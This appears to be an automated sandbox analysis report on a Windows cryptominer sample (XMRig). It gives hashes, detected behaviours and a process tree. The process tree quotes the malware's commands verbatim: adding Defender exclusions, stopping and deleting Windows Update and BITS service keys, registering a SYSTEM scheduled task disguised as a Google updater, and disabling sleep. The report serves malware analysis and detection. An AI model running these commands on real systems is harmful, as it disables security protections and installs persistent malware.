Analysis
-
max time kernel
149s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-09-2022 17:22
General
-
Target
35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe
-
Size
7.9MB
-
MD5
8f76cc737082cc709dd4c9106c671ab6
-
SHA1
ba5de16d94e73b551f0c6e5d81eb8ee9d8093d11
-
SHA256
35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e
-
SHA512
b88ef3536b8af9677d189d5ed6fee9bdb0cda0e356bb4108ccf8f52211a5ac85b183f3edff3a8e723e79b6dfdce87d1450cdad5790cea35abfd283ed159f6ec2
-
SSDEEP
196608:+Al04HUfTrwa4FLxjAT0OR+xVHgbBlDmia6SMvzr:Gk3/FLxA0OR+biEmSwH
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/1220-226-0x00007FF645C80000-0x00007FF646474000-memory.dmp xmrig behavioral1/memory/1220-227-0x00007FF645C80000-0x00007FF646474000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
updater.exe35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts updater.exe File created C:\Windows\system32\drivers\etc\hosts 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1864 updater.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral1/memory/1220-226-0x00007FF645C80000-0x00007FF646474000-memory.dmp upx behavioral1/memory/1220-227-0x00007FF645C80000-0x00007FF646474000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
updater.exe35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe -
Processes:
resource yara_rule behavioral1/memory/2636-132-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp themida behavioral1/memory/2636-133-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp themida behavioral1/memory/2636-135-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp themida behavioral1/memory/2636-136-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp themida behavioral1/memory/2636-137-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp themida behavioral1/memory/2636-138-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp themida behavioral1/memory/2636-139-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp themida behavioral1/memory/2636-166-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1864-173-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp themida behavioral1/memory/1864-174-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp themida behavioral1/memory/1864-175-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp themida behavioral1/memory/1864-176-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp themida behavioral1/memory/1864-177-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp themida behavioral1/memory/1864-179-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp themida behavioral1/memory/1864-180-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp themida behavioral1/memory/1864-222-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida -
Processes:
35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exeupdater.exepid process 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe 1864 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 1864 set thread context of 3100 1864 updater.exe conhost.exe PID 1864 set thread context of 1220 1864 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.execmd.exe35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exeupdater.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4936 sc.exe 2148 sc.exe 4088 sc.exe 3872 sc.exe 2856 sc.exe 4356 sc.exe 5020 sc.exe 4308 sc.exe 3916 sc.exe 3556 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 4976 powershell.exe 4976 powershell.exe 5036 powershell.exe 5036 powershell.exe 4532 powershell.exe 4532 powershell.exe 2644 powershell.exe 2644 powershell.exe 312 powershell.exe 312 powershell.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe 1220 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 4976 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeShutdownPrivilege 4512 powercfg.exe Token: SeCreatePagefilePrivilege 4512 powercfg.exe Token: SeShutdownPrivilege 2036 powercfg.exe Token: SeCreatePagefilePrivilege 2036 powercfg.exe Token: SeShutdownPrivilege 2224 powercfg.exe Token: SeCreatePagefilePrivilege 2224 powercfg.exe Token: SeShutdownPrivilege 3908 powercfg.exe Token: SeCreatePagefilePrivilege 3908 powercfg.exe Token: SeIncreaseQuotaPrivilege 5036 powershell.exe Token: SeSecurityPrivilege 5036 powershell.exe Token: SeTakeOwnershipPrivilege 5036 powershell.exe Token: SeLoadDriverPrivilege 5036 powershell.exe Token: SeSystemProfilePrivilege 5036 powershell.exe Token: SeSystemtimePrivilege 5036 powershell.exe Token: SeProfSingleProcessPrivilege 5036 powershell.exe Token: SeIncBasePriorityPrivilege 5036 powershell.exe Token: SeCreatePagefilePrivilege 5036 powershell.exe Token: SeBackupPrivilege 5036 powershell.exe Token: SeRestorePrivilege 5036 powershell.exe Token: SeShutdownPrivilege 5036 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeSystemEnvironmentPrivilege 5036 powershell.exe Token: SeRemoteShutdownPrivilege 5036 powershell.exe Token: SeUndockPrivilege 5036 powershell.exe Token: SeManageVolumePrivilege 5036 powershell.exe Token: 33 5036 powershell.exe Token: 34 5036 powershell.exe Token: 35 5036 powershell.exe Token: 36 5036 powershell.exe Token: SeIncreaseQuotaPrivilege 5036 powershell.exe Token: SeSecurityPrivilege 5036 powershell.exe Token: SeTakeOwnershipPrivilege 5036 powershell.exe Token: SeLoadDriverPrivilege 5036 powershell.exe Token: SeSystemProfilePrivilege 5036 powershell.exe Token: SeSystemtimePrivilege 5036 powershell.exe Token: SeProfSingleProcessPrivilege 5036 powershell.exe Token: SeIncBasePriorityPrivilege 5036 powershell.exe Token: SeCreatePagefilePrivilege 5036 powershell.exe Token: SeBackupPrivilege 5036 powershell.exe Token: SeRestorePrivilege 5036 powershell.exe Token: SeShutdownPrivilege 5036 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeSystemEnvironmentPrivilege 5036 powershell.exe Token: SeRemoteShutdownPrivilege 5036 powershell.exe Token: SeUndockPrivilege 5036 powershell.exe Token: SeManageVolumePrivilege 5036 powershell.exe Token: 33 5036 powershell.exe Token: 34 5036 powershell.exe Token: 35 5036 powershell.exe Token: 36 5036 powershell.exe Token: SeIncreaseQuotaPrivilege 5036 powershell.exe Token: SeSecurityPrivilege 5036 powershell.exe Token: SeTakeOwnershipPrivilege 5036 powershell.exe Token: SeLoadDriverPrivilege 5036 powershell.exe Token: SeSystemProfilePrivilege 5036 powershell.exe Token: SeSystemtimePrivilege 5036 powershell.exe Token: SeProfSingleProcessPrivilege 5036 powershell.exe Token: SeIncBasePriorityPrivilege 5036 powershell.exe Token: SeCreatePagefilePrivilege 5036 powershell.exe Token: SeBackupPrivilege 5036 powershell.exe Token: SeRestorePrivilege 5036 powershell.exe Token: SeShutdownPrivilege 5036 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.execmd.execmd.exepowershell.exeupdater.execmd.execmd.exedescription pid process target process PID 2636 wrote to memory of 4976 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe powershell.exe PID 2636 wrote to memory of 4976 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe powershell.exe PID 2636 wrote to memory of 1248 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe cmd.exe PID 2636 wrote to memory of 1248 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe cmd.exe PID 2636 wrote to memory of 5016 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe cmd.exe PID 2636 wrote to memory of 5016 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe cmd.exe PID 2636 wrote to memory of 5036 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe powershell.exe PID 2636 wrote to memory of 5036 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe powershell.exe PID 1248 wrote to memory of 4936 1248 cmd.exe sc.exe PID 1248 wrote to memory of 4936 1248 cmd.exe sc.exe PID 5016 wrote to memory of 4512 5016 cmd.exe powercfg.exe PID 5016 wrote to memory of 4512 5016 cmd.exe powercfg.exe PID 1248 wrote to memory of 5020 1248 cmd.exe sc.exe PID 1248 wrote to memory of 5020 1248 cmd.exe sc.exe PID 5016 wrote to memory of 2036 5016 cmd.exe powercfg.exe PID 5016 wrote to memory of 2036 5016 cmd.exe powercfg.exe PID 1248 wrote to memory of 4308 1248 cmd.exe sc.exe PID 1248 wrote to memory of 4308 1248 cmd.exe sc.exe PID 5016 wrote to memory of 2224 5016 cmd.exe powercfg.exe PID 5016 wrote to memory of 2224 5016 cmd.exe powercfg.exe PID 5016 wrote to memory of 3908 5016 cmd.exe powercfg.exe PID 5016 wrote to memory of 3908 5016 cmd.exe powercfg.exe PID 1248 wrote to memory of 3916 1248 cmd.exe sc.exe PID 1248 wrote to memory of 3916 1248 cmd.exe sc.exe PID 1248 wrote to memory of 3556 1248 cmd.exe sc.exe PID 1248 wrote to memory of 3556 1248 cmd.exe sc.exe PID 1248 wrote to memory of 1440 1248 cmd.exe reg.exe PID 1248 wrote to memory of 1440 1248 cmd.exe reg.exe PID 1248 wrote to memory of 5084 1248 cmd.exe reg.exe PID 1248 wrote to memory of 5084 1248 cmd.exe reg.exe PID 1248 wrote to memory of 2660 1248 cmd.exe reg.exe PID 1248 wrote to memory of 2660 1248 cmd.exe reg.exe PID 1248 wrote to memory of 344 1248 cmd.exe reg.exe PID 1248 wrote to memory of 344 1248 cmd.exe reg.exe PID 1248 wrote to memory of 2484 1248 cmd.exe reg.exe PID 1248 wrote to memory of 2484 1248 cmd.exe reg.exe PID 2636 wrote to memory of 4532 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe powershell.exe PID 2636 wrote to memory of 4532 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe powershell.exe PID 4532 wrote to memory of 5080 4532 powershell.exe schtasks.exe PID 4532 wrote to memory of 5080 4532 powershell.exe schtasks.exe PID 1864 wrote to memory of 2644 1864 updater.exe powershell.exe PID 1864 wrote to memory of 2644 1864 updater.exe powershell.exe PID 1864 wrote to memory of 1032 1864 updater.exe cmd.exe PID 1864 wrote to memory of 1032 1864 updater.exe cmd.exe PID 1864 wrote to memory of 4212 1864 updater.exe cmd.exe PID 1864 wrote to memory of 4212 1864 updater.exe cmd.exe PID 4212 wrote to memory of 4648 4212 cmd.exe powercfg.exe PID 4212 wrote to memory of 4648 4212 cmd.exe powercfg.exe PID 1864 wrote to memory of 312 1864 updater.exe powershell.exe PID 1864 wrote to memory of 312 1864 updater.exe powershell.exe PID 1032 wrote to memory of 3872 1032 cmd.exe sc.exe PID 1032 wrote to memory of 3872 1032 cmd.exe sc.exe PID 4212 wrote to memory of 3668 4212 cmd.exe powercfg.exe PID 4212 wrote to memory of 3668 4212 cmd.exe powercfg.exe PID 1032 wrote to memory of 2148 1032 cmd.exe sc.exe PID 1032 wrote to memory of 2148 1032 cmd.exe sc.exe PID 1032 wrote to memory of 4088 1032 cmd.exe sc.exe PID 1032 wrote to memory of 4088 1032 cmd.exe sc.exe PID 4212 wrote to memory of 1552 4212 cmd.exe powercfg.exe PID 4212 wrote to memory of 1552 4212 cmd.exe powercfg.exe PID 4212 wrote to memory of 4140 4212 cmd.exe powercfg.exe PID 4212 wrote to memory of 4140 4212 cmd.exe powercfg.exe PID 1032 wrote to memory of 2856 1032 cmd.exe sc.exe PID 1032 wrote to memory of 2856 1032 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe"C:\Users\Admin\AppData\Local\Temp\35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#qauvexd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ceflnjkax#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
